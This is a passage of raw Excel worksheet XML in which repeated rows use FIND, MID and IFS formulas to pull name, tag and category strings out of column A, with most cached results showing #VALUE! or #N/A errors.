    ISNUMBER(FIND("tag/",$A1783)), MID($A1783, FIND("tag/",$A1783) + 4, LEN($A1783) - FIND("tag/",$A1783)),
    ISNUMBER(FIND("category",$A1783)), MID($A1783, FIND("category",$A1783) + 9, LEN($A1783) - FIND("category",$A1783)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1783" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1784" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1784" t="s">
        <v>2629</v>
      </c>
      <c r="B1784" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1784" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1784" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1784" t="e" cm="1">
        <f t="array" ref="E1784">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1784)), MID($A1784, FIND("name=",$A1784) + 5, LEN($A1784) - FIND("name=",$A1784)),
    ISNUMBER(FIND("tag/",$A1784)), MID($A1784, FIND("tag/",$A1784) + 4, LEN($A1784) - FIND("tag/",$A1784)),
    ISNUMBER(FIND("category",$A1784)), MID($A1784, FIND("category",$A1784) + 9, LEN($A1784) - FIND("category",$A1784)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1784" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1785" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1785" t="s">
        <v>2630</v>
      </c>
      <c r="B1785" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1785" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1785" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1785" t="e" cm="1">
        <f t="array" ref="E1785">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1785)), MID($A1785, FIND("name=",$A1785) + 5, LEN($A1785) - FIND("name=",$A1785)),
    ISNUMBER(FIND("tag/",$A1785)), MID($A1785, FIND("tag/",$A1785) + 4, LEN($A1785) - FIND("tag/",$A1785)),
    ISNUMBER(FIND("category",$A1785)), MID($A1785, FIND("category",$A1785) + 9, LEN($A1785) - FIND("category",$A1785)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1785" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1786" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1786" t="s">
        <v>2631</v>
      </c>
      <c r="B1786" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1786" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1786" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1786" t="e" cm="1">
        <f t="array" ref="E1786">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1786)), MID($A1786, FIND("name=",$A1786) + 5, LEN($A1786) - FIND("name=",$A1786)),
    ISNUMBER(FIND("tag/",$A1786)), MID($A1786, FIND("tag/",$A1786) + 4, LEN($A1786) - FIND("tag/",$A1786)),
    ISNUMBER(FIND("category",$A1786)), MID($A1786, FIND("category",$A1786) + 9, LEN($A1786) - FIND("category",$A1786)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1786" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1787" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1787" t="s">
        <v>2632</v>
      </c>
      <c r="B1787" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1787" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1787" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1787" t="e" cm="1">
        <f t="array" ref="E1787">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1787)), MID($A1787, FIND("name=",$A1787) + 5, LEN($A1787) - FIND("name=",$A1787)),
    ISNUMBER(FIND("tag/",$A1787)), MID($A1787, FIND("tag/",$A1787) + 4, LEN($A1787) - FIND("tag/",$A1787)),
    ISNUMBER(FIND("category",$A1787)), MID($A1787, FIND("category",$A1787) + 9, LEN($A1787) - FIND("category",$A1787)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1787" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1788" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1788" t="s">
        <v>2633</v>
      </c>
      <c r="B1788" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1788" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1788" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1788" t="e" cm="1">
        <f t="array" ref="E1788">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1788)), MID($A1788, FIND("name=",$A1788) + 5, LEN($A1788) - FIND("name=",$A1788)),
    ISNUMBER(FIND("tag/",$A1788)), MID($A1788, FIND("tag/",$A1788) + 4, LEN($A1788) - FIND("tag/",$A1788)),
    ISNUMBER(FIND("category",$A1788)), MID($A1788, FIND("category",$A1788) + 9, LEN($A1788) - FIND("category",$A1788)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1788" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1789" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1789" t="s">
        <v>2634</v>
      </c>
      <c r="B1789" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1789" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1789" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1789" t="e" cm="1">
        <f t="array" ref="E1789">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1789)), MID($A1789, FIND("name=",$A1789) + 5, LEN($A1789) - FIND("name=",$A1789)),
    ISNUMBER(FIND("tag/",$A1789)), MID($A1789, FIND("tag/",$A1789) + 4, LEN($A1789) - FIND("tag/",$A1789)),
    ISNUMBER(FIND("category",$A1789)), MID($A1789, FIND("category",$A1789) + 9, LEN($A1789) - FIND("category",$A1789)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1789" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1790" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1790" t="s">
        <v>2635</v>
      </c>
      <c r="B1790" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1790" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1790" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1790" t="e" cm="1">
        <f t="array" ref="E1790">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1790)), MID($A1790, FIND("name=",$A1790) + 5, LEN($A1790) - FIND("name=",$A1790)),
    ISNUMBER(FIND("tag/",$A1790)), MID($A1790, FIND("tag/",$A1790) + 4, LEN($A1790) - FIND("tag/",$A1790)),
    ISNUMBER(FIND("category",$A1790)), MID($A1790, FIND("category",$A1790) + 9, LEN($A1790) - FIND("category",$A1790)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1790" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1791" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1791" t="s">
        <v>2636</v>
      </c>
      <c r="B1791" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1791" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1791" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1791" t="e" cm="1">
        <f t="array" ref="E1791">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1791)), MID($A1791, FIND("name=",$A1791) + 5, LEN($A1791) - FIND("name=",$A1791)),
    ISNUMBER(FIND("tag/",$A1791)), MID($A1791, FIND("tag/",$A1791) + 4, LEN($A1791) - FIND("tag/",$A1791)),
    ISNUMBER(FIND("category",$A1791)), MID($A1791, FIND("category",$A1791) + 9, LEN($A1791) - FIND("category",$A1791)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1791" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1792" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1792" t="s">
        <v>2637</v>
      </c>
      <c r="B1792" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1792" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1792" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1792" t="e" cm="1">
        <f t="array" ref="E1792">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1792)), MID($A1792, FIND("name=",$A1792) + 5, LEN($A1792) - FIND("name=",$A1792)),
    ISNUMBER(FIND("tag/",$A1792)), MID($A1792, FIND("tag/",$A1792) + 4, LEN($A1792) - FIND("tag/",$A1792)),
    ISNUMBER(FIND("category",$A1792)), MID($A1792, FIND("category",$A1792) + 9, LEN($A1792) - FIND("category",$A1792)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1792" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1793" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1793" t="s">
        <v>2638</v>
      </c>
      <c r="B1793" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1793" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1793" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1793" t="e" cm="1">
        <f t="array" ref="E1793">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1793)), MID($A1793, FIND("name=",$A1793) + 5, LEN($A1793) - FIND("name=",$A1793)),
    ISNUMBER(FIND("tag/",$A1793)), MID($A1793, FIND("tag/",$A1793) + 4, LEN($A1793) - FIND("tag/",$A1793)),
    ISNUMBER(FIND("category",$A1793)), MID($A1793, FIND("category",$A1793) + 9, LEN($A1793) - FIND("category",$A1793)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1793" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1794" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1794" t="s">
        <v>2639</v>
      </c>
      <c r="B1794" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1794" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1794" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1794" t="e" cm="1">
        <f t="array" ref="E1794">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1794)), MID($A1794, FIND("name=",$A1794) + 5, LEN($A1794) - FIND("name=",$A1794)),
    ISNUMBER(FIND("tag/",$A1794)), MID($A1794, FIND("tag/",$A1794) + 4, LEN($A1794) - FIND("tag/",$A1794)),
    ISNUMBER(FIND("category",$A1794)), MID($A1794, FIND("category",$A1794) + 9, LEN($A1794) - FIND("category",$A1794)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1794" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1795" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1795" t="s">
        <v>2640</v>
      </c>
      <c r="B1795" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1795" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1795" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1795" t="e" cm="1">
        <f t="array" ref="E1795">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1795)), MID($A1795, FIND("name=",$A1795) + 5, LEN($A1795) - FIND("name=",$A1795)),
    ISNUMBER(FIND("tag/",$A1795)), MID($A1795, FIND("tag/",$A1795) + 4, LEN($A1795) - FIND("tag/",$A1795)),
    ISNUMBER(FIND("category",$A1795)), MID($A1795, FIND("category",$A1795) + 9, LEN($A1795) - FIND("category",$A1795)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1795" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1796" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1796" t="s">
        <v>2641</v>
      </c>
      <c r="B1796" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1796" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1796" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1796" t="e" cm="1">
        <f t="array" ref="E1796">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1796)), MID($A1796, FIND("name=",$A1796) + 5, LEN($A1796) - FIND("name=",$A1796)),
    ISNUMBER(FIND("tag/",$A1796)), MID($A1796, FIND("tag/",$A1796) + 4, LEN($A1796) - FIND("tag/",$A1796)),
    ISNUMBER(FIND("category",$A1796)), MID($A1796, FIND("category",$A1796) + 9, LEN($A1796) - FIND("category",$A1796)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1796" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1797" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1797" t="s">
        <v>2642</v>
      </c>
      <c r="B1797" t="e">
        <f t="shared" si="82"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1797" t="e">
        <f t="shared" si="83"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1797" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1797" t="e" cm="1">
        <f t="array" ref="E1797">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1797)), MID($A1797, FIND("name=",$A1797) + 5, LEN($A1797) - FIND("name=",$A1797)),
    ISNUMBER(FIND("tag/",$A1797)), MID($A1797, FIND("tag/",$A1797) + 4, LEN($A1797) - FIND("tag/",$A1797)),
    ISNUMBER(FIND("category",$A1797)), MID($A1797, FIND("category",$A1797) + 9, LEN($A1797) - FIND("category",$A1797)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1797" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1798" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1798" t="s">
        <v>2643</v>
      </c>
      <c r="B1798" t="e">
        <f t="shared" ref="B1798:B1861" si="85">IF(FIND("name=",A1798,1)&gt;0,MID(A1798,FIND("name=",A1798,1)+5,LEN(A1798)-FIND("name=",A1798,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C1798" t="e">
        <f t="shared" ref="C1798:C1861" si="86">IF(FIND("tag/",$A1798,1)&gt;0,MID($A1798,FIND("tag/",$A1798,1)+4,LEN($A1798)-FIND("tag/",$A1798,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D1798" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1798" t="e" cm="1">
        <f t="array" ref="E1798">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1798)), MID($A1798, FIND("name=",$A1798) + 5, LEN($A1798) - FIND("name=",$A1798)),
    ISNUMBER(FIND("tag/",$A1798)), MID($A1798, FIND("tag/",$A1798) + 4, LEN($A1798) - FIND("tag/",$A1798)),
    ISNUMBER(FIND("category",$A1798)), MID($A1798, FIND("category",$A1798) + 9, LEN($A1798) - FIND("category",$A1798)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1798" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1799" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1799" t="s">
        <v>2644</v>
      </c>
      <c r="B1799" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1799" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1799" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1799" t="e" cm="1">
        <f t="array" ref="E1799">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1799)), MID($A1799, FIND("name=",$A1799) + 5, LEN($A1799) - FIND("name=",$A1799)),
    ISNUMBER(FIND("tag/",$A1799)), MID($A1799, FIND("tag/",$A1799) + 4, LEN($A1799) - FIND("tag/",$A1799)),
    ISNUMBER(FIND("category",$A1799)), MID($A1799, FIND("category",$A1799) + 9, LEN($A1799) - FIND("category",$A1799)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1799" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1800" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1800" t="s">
        <v>2645</v>
      </c>
      <c r="B1800" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1800" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1800" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1800" t="e" cm="1">
        <f t="array" ref="E1800">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1800)), MID($A1800, FIND("name=",$A1800) + 5, LEN($A1800) - FIND("name=",$A1800)),
    ISNUMBER(FIND("tag/",$A1800)), MID($A1800, FIND("tag/",$A1800) + 4, LEN($A1800) - FIND("tag/",$A1800)),
    ISNUMBER(FIND("category",$A1800)), MID($A1800, FIND("category",$A1800) + 9, LEN($A1800) - FIND("category",$A1800)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1800" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1801" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1801" t="s">
        <v>2646</v>
      </c>
      <c r="B1801" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1801" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1801" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1801" t="e" cm="1">
        <f t="array" ref="E1801">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1801)), MID($A1801, FIND("name=",$A1801) + 5, LEN($A1801) - FIND("name=",$A1801)),
    ISNUMBER(FIND("tag/",$A1801)), MID($A1801, FIND("tag/",$A1801) + 4, LEN($A1801) - FIND("tag/",$A1801)),
    ISNUMBER(FIND("category",$A1801)), MID($A1801, FIND("category",$A1801) + 9, LEN($A1801) - FIND("category",$A1801)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1801" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1802" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1802" t="s">
        <v>2647</v>
      </c>
      <c r="B1802" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1802" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1802" t="e">
        <f t="shared" si="84"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1802" t="e" cm="1">
        <f t="array" ref="E1802">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1802)), MID($A1802, FIND("name=",$A1802) + 5, LEN($A1802) - FIND("name=",$A1802)),
    ISNUMBER(FIND("tag/",$A1802)), MID($A1802, FIND("tag/",$A1802) + 4, LEN($A1802) - FIND("tag/",$A1802)),
    ISNUMBER(FIND("category",$A1802)), MID($A1802, FIND("category",$A1802) + 9, LEN($A1802) - FIND("category",$A1802)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1802" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1803" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1803" t="s">
        <v>2648</v>
      </c>
      <c r="B1803" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1803" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1803" t="e">
        <f t="shared" ref="D1803:D1866" si="87">IF(FIND("category",$A1803,1)&gt;0,MID($A1803,FIND("category",$A1803,1)+9,LEN($A1803)-FIND("category",$A1803,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E1803" t="e" cm="1">
        <f t="array" ref="E1803">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1803)), MID($A1803, FIND("name=",$A1803) + 5, LEN($A1803) - FIND("name=",$A1803)),
    ISNUMBER(FIND("tag/",$A1803)), MID($A1803, FIND("tag/",$A1803) + 4, LEN($A1803) - FIND("tag/",$A1803)),
    ISNUMBER(FIND("category",$A1803)), MID($A1803, FIND("category",$A1803) + 9, LEN($A1803) - FIND("category",$A1803)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1803" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1804" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1804" t="s">
        <v>2649</v>
      </c>
      <c r="B1804" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1804" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1804" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1804" t="e" cm="1">
        <f t="array" ref="E1804">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1804)), MID($A1804, FIND("name=",$A1804) + 5, LEN($A1804) - FIND("name=",$A1804)),
    ISNUMBER(FIND("tag/",$A1804)), MID($A1804, FIND("tag/",$A1804) + 4, LEN($A1804) - FIND("tag/",$A1804)),
    ISNUMBER(FIND("category",$A1804)), MID($A1804, FIND("category",$A1804) + 9, LEN($A1804) - FIND("category",$A1804)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1804" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1805" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1805" t="s">
        <v>2650</v>
      </c>
      <c r="B1805" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1805" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1805" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1805" t="e" cm="1">
        <f t="array" ref="E1805">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1805)), MID($A1805, FIND("name=",$A1805) + 5, LEN($A1805) - FIND("name=",$A1805)),
    ISNUMBER(FIND("tag/",$A1805)), MID($A1805, FIND("tag/",$A1805) + 4, LEN($A1805) - FIND("tag/",$A1805)),
    ISNUMBER(FIND("category",$A1805)), MID($A1805, FIND("category",$A1805) + 9, LEN($A1805) - FIND("category",$A1805)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1805" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1806" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1806" t="s">
        <v>2651</v>
      </c>
      <c r="B1806" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1806" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1806" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1806" t="e" cm="1">
        <f t="array" ref="E1806">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1806)), MID($A1806, FIND("name=",$A1806) + 5, LEN($A1806) - FIND("name=",$A1806)),
    ISNUMBER(FIND("tag/",$A1806)), MID($A1806, FIND("tag/",$A1806) + 4, LEN($A1806) - FIND("tag/",$A1806)),
    ISNUMBER(FIND("category",$A1806)), MID($A1806, FIND("category",$A1806) + 9, LEN($A1806) - FIND("category",$A1806)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1806" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1807" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1807" t="s">
        <v>2652</v>
      </c>
      <c r="B1807" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1807" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1807" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1807" t="e" cm="1">
        <f t="array" ref="E1807">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1807)), MID($A1807, FIND("name=",$A1807) + 5, LEN($A1807) - FIND("name=",$A1807)),
    ISNUMBER(FIND("tag/",$A1807)), MID($A1807, FIND("tag/",$A1807) + 4, LEN($A1807) - FIND("tag/",$A1807)),
    ISNUMBER(FIND("category",$A1807)), MID($A1807, FIND("category",$A1807) + 9, LEN($A1807) - FIND("category",$A1807)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1807" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1808" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1808" t="s">
        <v>2653</v>
      </c>
      <c r="B1808" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1808" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1808" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1808" t="e" cm="1">
        <f t="array" ref="E1808">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1808)), MID($A1808, FIND("name=",$A1808) + 5, LEN($A1808) - FIND("name=",$A1808)),
    ISNUMBER(FIND("tag/",$A1808)), MID($A1808, FIND("tag/",$A1808) + 4, LEN($A1808) - FIND("tag/",$A1808)),
    ISNUMBER(FIND("category",$A1808)), MID($A1808, FIND("category",$A1808) + 9, LEN($A1808) - FIND("category",$A1808)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1808" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1809" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1809" t="s">
        <v>2654</v>
      </c>
      <c r="B1809" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1809" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1809" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1809" t="e" cm="1">
        <f t="array" ref="E1809">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1809)), MID($A1809, FIND("name=",$A1809) + 5, LEN($A1809) - FIND("name=",$A1809)),
    ISNUMBER(FIND("tag/",$A1809)), MID($A1809, FIND("tag/",$A1809) + 4, LEN($A1809) - FIND("tag/",$A1809)),
    ISNUMBER(FIND("category",$A1809)), MID($A1809, FIND("category",$A1809) + 9, LEN($A1809) - FIND("category",$A1809)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1809" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1810" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1810" t="s">
        <v>2655</v>
      </c>
      <c r="B1810" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1810" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1810" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1810" t="e" cm="1">
        <f t="array" ref="E1810">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1810)), MID($A1810, FIND("name=",$A1810) + 5, LEN($A1810) - FIND("name=",$A1810)),
    ISNUMBER(FIND("tag/",$A1810)), MID($A1810, FIND("tag/",$A1810) + 4, LEN($A1810) - FIND("tag/",$A1810)),
    ISNUMBER(FIND("category",$A1810)), MID($A1810, FIND("category",$A1810) + 9, LEN($A1810) - FIND("category",$A1810)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1810" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1811" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1811" t="s">
        <v>2656</v>
      </c>
      <c r="B1811" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1811" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1811" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1811" t="e" cm="1">
        <f t="array" ref="E1811">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1811)), MID($A1811, FIND("name=",$A1811) + 5, LEN($A1811) - FIND("name=",$A1811)),
    ISNUMBER(FIND("tag/",$A1811)), MID($A1811, FIND("tag/",$A1811) + 4, LEN($A1811) - FIND("tag/",$A1811)),
    ISNUMBER(FIND("category",$A1811)), MID($A1811, FIND("category",$A1811) + 9, LEN($A1811) - FIND("category",$A1811)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1811" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1812" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1812" t="s">
        <v>2657</v>
      </c>
      <c r="B1812" t="e">
        <f t="shared" si="85"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1812" t="e">
        <f t="shared" si="86"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1812" t="e">
        <f t="shared" si="87"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1812" t="e" cm="1">
        <f t="array" ref="E1812">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1812)), MID($A1812, FIND("name=",$A1812) + 5, LEN($A1812) - FIND("name=",$A1812)),
